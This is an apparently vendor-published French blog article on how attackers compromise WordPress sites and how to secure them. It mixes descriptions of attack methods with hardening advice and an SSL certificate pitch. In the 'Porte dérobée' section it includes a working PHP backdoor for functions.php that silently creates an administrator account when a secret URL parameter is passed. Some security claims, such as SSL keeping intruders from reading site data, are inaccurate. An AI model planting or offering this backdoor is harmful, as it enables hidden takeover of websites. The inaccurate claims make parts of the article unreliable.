Comment pirater WordPress ?

Intro

Avant de commencer cet article, nous aimerions que vous sachiez que le piratage est illégal, et que nous ne motivons ni n'encourageons aucune activité malveillante. Cet article a pour seul but d'acquérir des connaissances sur la façon dont les escrocs travaillent et sur les diverses méthodes de sécurité des sites qui sont essentielles pour les tenir à distance. Discutons-en :

• Comment les escrocs piratent-ils WordPress ?
• Comment sécuriser votre site WP contre les escrocs ?

Sans plus attendre, entrons dans le vif du sujet.

Comment pirater un site WordPress en ligne ?

(Source : wpsecurityninja.com)

Utilisation de WPScan :

WPScan est un scanner de sécurité WP qui aide les propriétaires de sites à vérifier la présence de vulnérabilités sur leur site WordPress, mais ce scanner est également utilisé par les pirates pour satisfaire leurs motivations à pirater des sites Web.

WPScan permet aux propriétaires et aux administrateurs de sites de spécifier les comptes utilisateurs WP et les mots de passe par force brute, ce qui constitue la première étape pour obtenir un accès non autorisé aux comptes WP.

(Forcer le nom d'utilisateur et le mot de passe en utilisant WPScan. Source : Medium)

Attaques MIM :

Les attaques de type Man-in-Middle (MIM) peuvent être facilement réalisées dans le cas d'utilisateurs utilisant des réseaux locaux similaires. Les connexions d'utilisateurs non cryptées sont une cible facile puisque tous les détails sont visibles en texte clair.

Le logiciel utilisé pour mener ce type d'attaques peut repérer les thèmes et les plugins compromis et dénombrer les utilisateurs.

!Attaques MIM](image3.png) (Source : Medium)

Injections SQL :

Les attaques par injection SQL sont considérées comme les attaques les plus importantes utilisées pour pénétrer les sites Web. Ces attaques ciblent les passerelles dorsales du site Web et permettent aux pirates de les pénétrer en mettant en œuvre des commandes compromises.

(Source : secure.wphackedhelp.com)

Ces pénétrations permettent également aux pirates de modifier les bases de données et les commandes et de supprimer ou de voler des informations sur le site.

Comme ces attaques SQL repèrent les sites vulnérables et non corrigés, elles rendent la tâche de piratage facile et réussie.

Utilisation de My SQL/cPanel :

Dans cette méthode, les pirates créent un faux compte ou modifient le mot de passe d'un utilisateur actuel du site WP. Les pirates tentent de pénétrer via le cPanel en ouvrant PhpMyAdmin. Ils sont à l'affût de la table se terminant par _users et trouvent l'utilisateur qu'ils veulent modifier.

Cela leur permettra de modifier les informations d'identification de l'utilisateur qu'ils prévoient de pirater. Ils recherchent l'utilisateur et changent son mot de passe (du champ user_pass) en ouvrant le générateur MD5 en ligne, et le remplacent par celui qu'ils souhaitent, puis cliquent sur #.

!Utilisation de Mon SQL/cPanel](image5.jpg) (Les noms d'utilisateur, les mots de passe hachés des utilisateurs, leurs identifiants de messagerie, etc. sont tous stockés dans la table de base de données wp_users. Source : firstsiteguide.com)

Les noms d'utilisateur, les mots de passe hachés des utilisateurs, leurs identifiants de messagerie, etc. sont tous stockés dans la table de base de données wp_users.

Modification de Functions.php :

Les pirates accèdent également au cPanel pour modifier le fichier Functions.php. En déverrouillant le gestionnaire de fichiers, ils recherchent le dossier du thème actif. À partir du dossier public_html/wp_content/themes, ils repèrent le thème et modifient le fichier functions.php en y plaçant leur code compromis. Le piratage est déjà en cours car un nouveau compte a été créé par les pirates. Une fois terminé, ils effacent le code compromis.

Créer un nouveau compte utilisateur via FTP :

Généralement, les comptes FTP aident les propriétaires de sites à générer un répertoire au sein de leur site qui permet à des utilisateurs spécifiques de charger/télécharger leurs fichiers en utilisant leurs identifiants de connexion.

Ces fichiers sont également consultés sur Internet.

> Étapes de la création d'un compte FTP sur le site : > > - Entrez les données souhaitées > - Entrez le nom d'utilisateur du nouvel utilisateur FTP > - Entrez le mot de passe pour l'attribution du compte pour l'accès via FTP > Entrez le nom du répertoire auquel vous souhaitez accéder par FTP. > Inscrivez l'espace MB désiré que vous souhaitez attribuer à ce dossier. > Appuyez ensuite sur le bouton "Create " pour créer le nouveau compte.

Les données mentionnées ci-dessous doivent être chargées par le nouvel utilisateur pour obtenir l'accès via FTP.

Adresse / Nom d'hôte / Adresse : yourdomain.com ou ftp.yourdomain.com

Utilisateur / User : [email protected]

Password / Mot de passe : El mot de passe attribué à ce compte FTP

Port : 21 Nommez le dossier pour le chargement/téléchargement des fichiers.

Le nouvel utilisateur aura des droits de lecture et d'écriture à la fois sur le répertoire choisi et sur tous les sous-répertoires qu'il contient.

Par exemple, si vous créez l'utilisateur client et lui donnez accès au répertoire / home / user / public_html

Pénétrer par Backdoor :

Un moyen malveillant de pénétrer le site est de passer par la porte dérobée. Qu'il s'agisse d'un escroc qui veut accéder à votre site, ou d'un utilisateur victime qui veut récupérer l'accès à son site via une porte dérobée, tous deux doivent suivre les étapes suivantes.

Lorsqu'un nouveau compte utilisateur est créé via FTP ou qu'une réinitialisation du mot de passe est effectuée, mais qu'elle ne donne pas les résultats escomptés, l'utilisateur peut vouloir pirater son site via une porte dérobée et récupérer son accès administrateur.

**Étapes pour créer une porte dérobée (backdoor)

• Ouvrez le fichier functions.php et collez le code ci-dessous.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Enregistrez ensuite les modifications.

Crypto Jacking & Cryptocurrency Mining :

La popularité des crypto-monnaies a donné naissance à de nouvelles cyber-menaces comme le crypto-jacking, également appelé logiciel malveillant de minage de crypto-monnaies.

L'acte de confisquer un ordinateur contre la volonté et la conscience de l'utilisateur est appelé crypto-jacking. Dans les logiciels malveillants de crypto-jacking, les escrocs infectent l'ordinateur de l'utilisateur avec des logiciels malveillants délivrés par des logiciels pour compromettre les systèmes et les réseaux.

Phishing :

Le phishing est une méthode par laquelle les fraudeurs dupent les utilisateurs de leurs informations sensibles (identifiants de connexion, numéro de compte social, code PIN, détails de carte de crédit, etc.) en se faisant passer pour des entités légales. ) en se faisant passer pour des personnes morales. Ils utilisent généralement des courriers électroniques pour parvenir à leurs fins.

Exemple: Un escroc peut se faire passer pour une source fiable et recueillir des données personnelles auprès d'utilisateurs pour satisfaire ses désirs. > Il peut également insérer un bad link dans l'e-mail de phishing et diriger l'utilisateur vers un site frauduleux pour lui transmettre un logiciel malveillant.

Malware :

Les statistiques de sécurité de WordPress indiquent que 4000 sites Web WP sont infectés par des logiciels malveillants en raison de faux plugins de référencement.

Les escrocs n'ont pas besoin d'une source pour diffuser des malwares. Les plugins de référencement, les thèmes WP et de nombreux autres facteurs présents sur le site ont incité les pirates à utiliser le récent malware WP-VCD.

Même les courriels de phishing sont des portes d'entrée pour diffuser des logiciels malveillants.

Ici aussi, la devise des pirates est la même, à savoir obtenir des données sensibles des utilisateurs en pénétrant dans les systèmes et en volant des informations.

WordPress Ransomware :

Dans le ransomware WP, les pirates utilisent des logiciels malveillants pour bloquer l'accès des utilisateurs aux systèmes et aux réseaux. L'utilisateur peut récupérer ses données en payant la rançon demandée par le pirate. Exemple: L'attaque Petya (https://en.wikipedia.org/wiki/Petya_(malware)), dans laquelle le pirate crypte vos fichiers et vos données et exige une rançon contre la clé de décryptage.

Attaque Cross-Site Scripting (XSS) :

Les attaques XSS sont menées par des pirates en injectant du contenu malveillant dans le site Web, exploitant ainsi le navigateur. Cette attaque permet au pirate de voler des données dans les cookies, de modifier le contenu du site et de s'emparer du site Web pour obtenir des données sensibles.

Clickjacking :

Dans le clickjacking, le pirate tente de compromettre un bouton/lien et incite l'utilisateur à cliquer sur l'objet compromis. Cela permet au pirate d'exécuter des commandes malveillantes pour accéder aux données sensibles de l'utilisateur.

Spoofing :

L'usurpation d'identité est une attaque au cours de laquelle une personne se déguise en une identité digne de confiance pour obtenir des avantages illégaux sur l'utilisateur et le pousser à fournir des informations confidentielles.

Pour prévenir toutes ces attaques de piratage, des mesures de sécurité spécifiques doivent être prises pour sécuriser votre site Web WP.

Comment sécuriser un site WordPress contre le piratage ?

(Source : envisagedigital.co.uk)

Les statistiques ci-dessus sont suffisantes pour indiquer la popularité de WordPress. C'est cette popularité qui rend cette plateforme CMS plus désirable pour les pirates, qui essaient diverses méthodes de piratage pour accéder aux sites Web WP et à leurs données.

Il est donc essentiel de savoir comment empêcher les pirates d'accéder à votre site WP.

Sécurisez votre site WP avec un certificat SSL :

Lorsque des données sont chargées sur le site, elles sont toujours en texte clair, ce qui est facilement visible par tous, y compris les pirates. Cela peut être risqué car les pirates peuvent utiliser les données de votre site à mauvais escient.

Les certificats SSL (Secure Socket Layers) sont des certificats numériques qui aident à sécuriser votre site WP avec un cryptage de 256 bits, convertissant ainsi les données de votre site en un format codé.

Les pirates ne peuvent pas lire les codes même s'ils ont obtenu l'accès à votre site et sont donc obligés de quitter ces sites.

!Sécurisez votre site WP avec un certificat SSL](ssl.jpg) (Source : clickssl.net)

Sélectionnez la marque de certificat SSL de votre choix (Comodo, Thawte, RapidSSL, etc.) et installez-la sur votre site WP. Dans le cas du type de certificat SSL, vous devez comprendre les domaines et les sous-domaines. Par exemple, si votre site WP comporte des sous-domaines, un seul certificat Wildcard bon marché ne coûtant que 45 $/an environ peut sécuriser l'ensemble de votre activité numérique.

L'émission rapide, le cryptage par clé de 2048 bits, l'amélioration du référencement, le sceau de confiance du site, la compatibilité avec 99 % des navigateurs et des mobiles, la politique de remboursement et la garantie sont quelques-uns des avantages de l'installation de certificats SSL Wildcard.

Des marques et des options variées de produits SSL, des tarifs avantageux et un excellent service clientèle sont quelques-uns des avantages de la boutique ClickSSL pour sécuriser votre site WP.

Mettez à jour vos employés :

Les erreurs humaines peuvent être désastreuses. Veillez donc toujours à tenir vos employés informés des dernières cybermenaces pour éviter qu'ils ne soient vulnérables.

Si vos employés peuvent repérer les signaux suspects d'un site web piraté au stade initial, ils peuvent en informer les personnes concernées et éviter que votre site et votre entreprise ne subissent des dommages supplémentaires.

Utilisez l'authentification à deux facteurs (2FA) :

La mise en œuvre de l'authentification à deux facteurs lors de la connexion au site est le moyen le plus important d'éviter les attaques par force brute. Outre l'ajout d'une couche de sécurité supplémentaire, ils permettent également de protéger les données du site et des utilisateurs.

En effet, si une couche de sécurité est compromise, l'escroc doit envahir la deuxième couche pour avoir accès au site Web.

C'est une tâche difficile et c'est pourquoi, dans la majorité des cas, les escrocs finissent par se tourner vers d'autres sites mal sécurisés.

Tip: WP 2FA est un plugin WP gratuit qui apporte une couche de sécurité supplémentaire à votre site WP.

Auditez régulièrement les utilisateurs de l'administration :

Ceci est important pour la sécurité de votre site WP. Assurez-vous d'auditer régulièrement vos utilisateurs admins et de vérifier leurs accès.

Veillez également à ce que vos utilisateurs, ainsi que vos employés, aient un accès limité en fonction de leurs tâches, afin d'éviter les failles de sécurité.

Mettez régulièrement à jour le noyau de WordPress :

Vous n'êtes pas au courant de WP Core ?

Laissez-moi vous dire que WP Core comprend tous les fichiers de base nécessaires au fonctionnement de WP.

La liste des fichiers dans le fichier zip de WP téléchargé sur WordPress.org est la suivante

(Source : ithemes.com)

Ces fichiers de base doivent être régulièrement mis à jour après la publication des mises à jour de sécurité, afin de corriger toutes les failles de sécurité.

Téléchargez les thèmes et plugins WP à partir de sources fiables :

Ceci est essentiel car les plugins peuvent être menaçants lorsqu'ils ne sont pas mis à jour ou installés à partir de sources non fiables. Dans le cas de l'utilisation de plugins gratuits ou payants, vérifiez toujours les facteurs indiqués ci-dessous :

• Évaluations et commentaires des utilisateurs
• Convivialité
• Compatibilité
• la sécurité
• Fiabilité

(Source : torquemag.io)

La même règle s'applique à l'installation des thèmes WP.

Mettez régulièrement à jour les thèmes et plugins WP :

Les thèmes et plugins WP obsolètes ou expirés constituent toujours une menace pour votre site WP car ils perdent leurs normes de sécurité. Pour empêcher les pirates d'utiliser ces passerelles pour diffuser des logiciels malveillants et accéder au site, veillez à mettre à jour régulièrement les thèmes et plugins utilisés sur votre site WP.

Cela aidera le plugin à fonctionner correctement et à rester synchronisé avec les dernières versions de WP.

> Tip: Sur la page des plugins, vous pouvez voir tous les plugins installés et un lien indiquant "Activer les mises à jour automatiques" à côté de chaque plugin. Activez-le pour les mises à jour automatiques.

Modifier le nom d'administrateur par défaut :

Les pirates sont trop intelligents, et ils peuvent facilement pénétrer votre site WP en utilisant le nom d'administrateur par défaut. Il est toujours préférable de modifier le nom d'administrateur par défaut pour empêcher les pirates d'exécuter des attaques par force brute pour obtenir un accès non autorisé à votre site Web.

Accorder un accès limité :

Ne donnez jamais plus que nécessaire et la même règle s'applique à l'octroi de l'accès au site aux utilisateurs ainsi qu'aux employés.

Le contrôle d'accès est la première règle de la sécurité du site et des données puisqu'il définit qui peut ou ne peut pas accéder au site. Bloquez toutes les entrées de WP admin et d'autres codes et données critiques pour la sécurité du site.

Non seulement l'accès limité améliore la productivité, mais il sécurise également votre site contre les entrées malveillantes.

Mise à jour de WordPress :

Lorsque votre WordPress n'est pas mis à jour, votre site risque d'être envahi par des pirates.

WordPress détient 37 % des parts de marché et publie régulièrement des mises à jour pour corriger les failles de sécurité et les bogues. Ces mises à jour incluent également de nouvelles fonctionnalités et des améliorations des fonctionnalités existantes qui sont utiles pour améliorer les performances de votre site.

!Pourquoi vous devriez toujours mettre à jour votre wordpress](update-wordpress.png) (Source : wpbeginner.com)

Maintenez votre site WP à jour pour une sécurité renforcée.

Wrapping Up :

Utilisez des mots de passe forts et complexes et maintenez votre site WP ainsi que les plugins et les thèmes à jour pour corriger toutes les failles de sécurité. Prenez le temps d'éduquer vos employés, car cela vous aidera toujours à prévenir les catastrophes.

Ne laissez jamais tomber la sécurité et veillez à toujours utiliser les meilleurs plugins de sécurité de confiance pour protéger votre site WP des regards indiscrets. En outre, sécurisez votre site avec SSL pour renforcer la confiance des clients, votre activité et votre référencement (/blog/what-is-seo/).

Maintenant que vous savez comment fonctionnent les pirates, nous espérons que cet article vous aidera à empêcher les pirates de pénétrer sur votre site et à gérer votre site WP de manière sécurisée.